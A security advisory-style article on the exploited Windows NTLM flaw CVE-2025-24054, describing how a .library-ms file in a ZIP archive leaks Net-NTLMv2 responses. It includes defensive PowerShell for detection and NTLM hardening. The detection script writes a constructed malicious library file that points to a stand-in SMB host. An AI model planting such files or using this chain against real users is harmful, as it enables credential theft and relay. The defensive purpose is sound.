A recently identified vulnerability in the Windows NTLM authentication protocol, tracked as CVE-2025-24054, has been actively exploited in attacks targeting both government and private institutions. This medium-severity flaw, patched in March 2025, lets an attacker obtain a victim's NTLM authentication material (the NTLMv2 challenge-response, commonly called a Net-NTLMv2 hash) with almost no user interaction; Microsoft classifies the impact as spoofing over a network.
Understanding the Vulnerability
NTLM (NT LAN Manager) is a legacy challenge-response authentication protocol that Windows still falls back to whenever Kerberos is unavailable, for example when a client connects to a server by IP address or to a host outside the domain. The vulnerability in question, CVE-2025-24054, can be triggered with minimal user interaction: simply selecting or right-clicking a malicious file is enough to make Windows authenticate to an attacker-controlled server, disclosing the user's NTLMv2 response. That response can then be cracked offline to recover the password, or relayed to another service while the authentication is in flight, giving the attacker unauthorized access to systems.
Exploitation Timeline and Targets
According to cybersecurity firm Check Point, exploitation of this vulnerability began approximately one week after Microsoft released patches in March 2025. Between March 19 and March 25, Check Point observed around a dozen malicious campaigns targeting this flaw. The attacks primarily focused on government and private institutions in Poland and Romania. The extracted NTLM hashes were collected on SMB servers located in Australia, Bulgaria, the Netherlands, Russia, and Turkey.
Attack Mechanism
The exploitation process involves the following steps:
1. Delivery of Malicious Archive: The attacker sends the target a ZIP archive containing a malicious .library-ms file. A .library-ms file is an XML library description, and this one points its library location at a UNC path on a server the attacker controls.
2. User Interaction: When the user extracts the ZIP archive and interacts with the .library-ms file (selecting or right-clicking it is enough; it does not have to be opened), Windows Explorer parses the file and attempts to connect to the remote SMB server it references.
3. NTLM Hash Disclosure: The SMB client authenticates automatically with the logged-on user's credentials, so the user's NTLMv2 challenge-response (Net-NTLMv2 hash) is sent to the attacker's server without any prompt. This is not the stored NT hash, so it cannot be used directly for pass-the-hash, but it is still valuable to the attacker.
4. Credential Exploitation: The attacker can crack the captured response offline to recover the user's password, or relay the authentication in real time to another service that does not require SMB signing or channel binding.
Depending on the privileges associated with the compromised account, the attacker could move laterally within the network, escalate privileges, and potentially compromise the entire domain.
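The following PowerShell script is an added example, not code from the original article or from Check Point. It triages a folder of extracted attachments for .library-ms files whose library location is a UNC path, which is the property that makes Explorer authenticate to a remote SMB server in the chain described above. The allow-list of trusted file servers, the sample file and the 203.0.113.10 address are constructed here for illustration.

```powershell
# Added example, not code from the original article or from Check Point.
# Triage a folder of extracted attachments: flag .library-ms files whose
# library location is a UNC path to a host that is not a known file server.
# $TrustedShareHosts, the sample file and 203.0.113.10 are constructed.

$TrustedShareHosts = @('fileserver01.corp.example', 'fileserver02.corp.example')

# Constructed sample: a library description whose only location is a remote
# share. A benign library normally points at knownfolder:{GUID} or a local path.
$sampleDir = Join-Path $env:TEMP 'libraryms-triage'
New-Item -ItemType Directory -Path $sampleDir -Force | Out-Null
@'
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\203.0.113.10\documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
'@ | Set-Content -Path (Join-Path $sampleDir 'invoice.library-ms') -Encoding UTF8

function Get-LibraryMsFindings {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string[]] $TrustedHosts = @()
    )
    Get-ChildItem -Path $Path -Filter '*.library-ms' -Recurse -File | ForEach-Object {
        $file = $_
        try {
            [xml] $doc = Get-Content -Path $file.FullName -Raw
        } catch {
            # A .library-ms that is not well-formed XML deserves a look as well.
            [pscustomobject] @{ File = $file.Name; Url = $null; Verdict = 'unparseable' }
            return
        }
        # Property access ignores the XML namespace, so no namespace manager is needed.
        $urls = @($doc.libraryDescription.searchConnectorDescriptionList.searchConnectorDescription.simpleLocation.url) |
            Where-Object { $_ }
        foreach ($url in $urls) {
            $verdict = 'benign'
            if ($url -match '^\\\\([^\\]+)\\') {
                # Capture the host part of \\host\share and compare it to the allow-list.
                $target = $Matches[1]
                $verdict = if ($TrustedHosts -contains $target) { 'trusted-unc' } else { 'EXTERNAL-UNC' }
            }
            [pscustomobject] @{ File = $file.Name; Url = $url; Verdict = $verdict }
        }
    }
}

Get-LibraryMsFindings -Path $sampleDir -TrustedHosts $TrustedShareHosts | Format-Table -AutoSize
```

Run against the directory where a mail gateway or sandbox extracts attachments, the sample file is reported as EXTERNAL-UNC. Libraries that legitimately reference a corporate file server show up as trusted-unc, so the allow-list, not the mere presence of a UNC path, is what separates a pointer to a collection server from an ordinary library file.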
Mitigation Strategies
To protect systems from this vulnerability, it is crucial to apply the security updates provided by Microsoft as part of the March 2025 Patch Tuesday. Additionally, organizations should consider the following measures:
– User Education: Train users to recognize and avoid interacting with suspicious files, especially those received from untrusted sources.
– Network Monitoring and Egress Filtering: Implement monitoring to detect unusual SMB authentication requests and other anomalous network activity, and block outbound SMB (TCP 445) from workstations to internet hosts. The collection servers in the observed campaigns were on the public internet, so a UNC path pointing at them never needs to succeed.
– Restrict NTLM Usage: Where possible, limit or disable the use of NTLM authentication in favor of more secure protocols like Kerberos.
– Extended Protection for Authentication (EPA): Enable EPA on services such as LDAP and Exchange Server to add an additional layer of verification to authentication requests.
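The PowerShell below is an added example, not code from the original article. It applies the "restrict NTLM" and network mitigations listed above in a safe order: audit outgoing NTLM first, block direct SMB egress to the internet, then review the audit log before switching to deny. The registry value, its meanings and event ID 8001 are Microsoft's; the firewall rule name and the seven-day window are illustrative. Run it elevated on a pilot host first.

```powershell
# Added example, not code from the original article. Audit outgoing NTLM,
# block direct SMB egress to the internet, review the audit events, and only
# then deny. Rule name and the review window are illustrative choices.

$msv = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

# Policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers"
#   0 = allow all, 1 = audit all, 2 = deny all (exceptions via ClientAllowedNTLMServers)
Set-ItemProperty -Path $msv -Name 'RestrictSendingNTLMTraffic' -Value 1 -Type DWord

# Direct SMB to an internet host is never legitimate from a workstation, so a
# UNC path to a collection server should be dropped by the host firewall.
$ruleName = 'Block outbound SMB to Internet'
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Protocol TCP `
        -RemotePort 445 -RemoteAddress Internet -Action Block -Profile Any | Out-Null
}

# Audit mode logs event 8001 in the NTLM operational log for every outgoing
# NTLM authentication that deny mode would block. Summarise the targets so the
# deny-mode allow-list is built from real usage rather than guesses.
function Get-OutgoingNtlmTargets {
    param([int] $Days = 7)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-NTLM/Operational'
        Id        = 8001
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
    ForEach-Object {
        # The event text names the server; fall back to the whole message if the format differs.
        $target = if ($_.Message -match 'Target server:\s*(\S+)') { $Matches[1] } else { $_.Message }
        [pscustomobject] @{ Time = $_.TimeCreated; Target = $target }
    } |
    Group-Object Target | Sort-Object Count -Descending |
    Select-Object Count, @{ Name = 'Target'; Expression = { $_.Name } }
}

Get-OutgoingNtlmTargets -Days 7 | Format-Table -AutoSize

# Once every target listed above is expected, record the exceptions and deny the rest:
# Set-ItemProperty -Path $msv -Name 'ClientAllowedNTLMServers' -Value @('fileserver01.corp.example') -Type MultiString
# Set-ItemProperty -Path $msv -Name 'RestrictSendingNTLMTraffic' -Value 2 -Type DWord
```

Two caveats a practitioner should keep in mind. First, when SMB to a UNC path fails, Windows can retry the same path over WebDAV through the WebClient service, so a firewall rule on TCP 445 alone does not close the outbound path; audit or disable WebClient on workstations as well. Second, restricting outgoing NTLM protects the client whose credential would leak, while SMB signing and EPA protect the servers a captured authentication could be relayed to; both sides are needed, and neither replaces installing the March 2025 update.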
Conclusion
The exploitation of CVE-2025-24054 within roughly a week of its patch underscores the importance of timely patch management and proactive security measures. Organizations must remain vigilant, ensuring that security updates are applied promptly, that NTLM usage is reduced and audited, and that users are educated about potential threats. By combining these measures, organizations can mitigate the risks associated with such vulnerabilities and protect their systems from unauthorized access.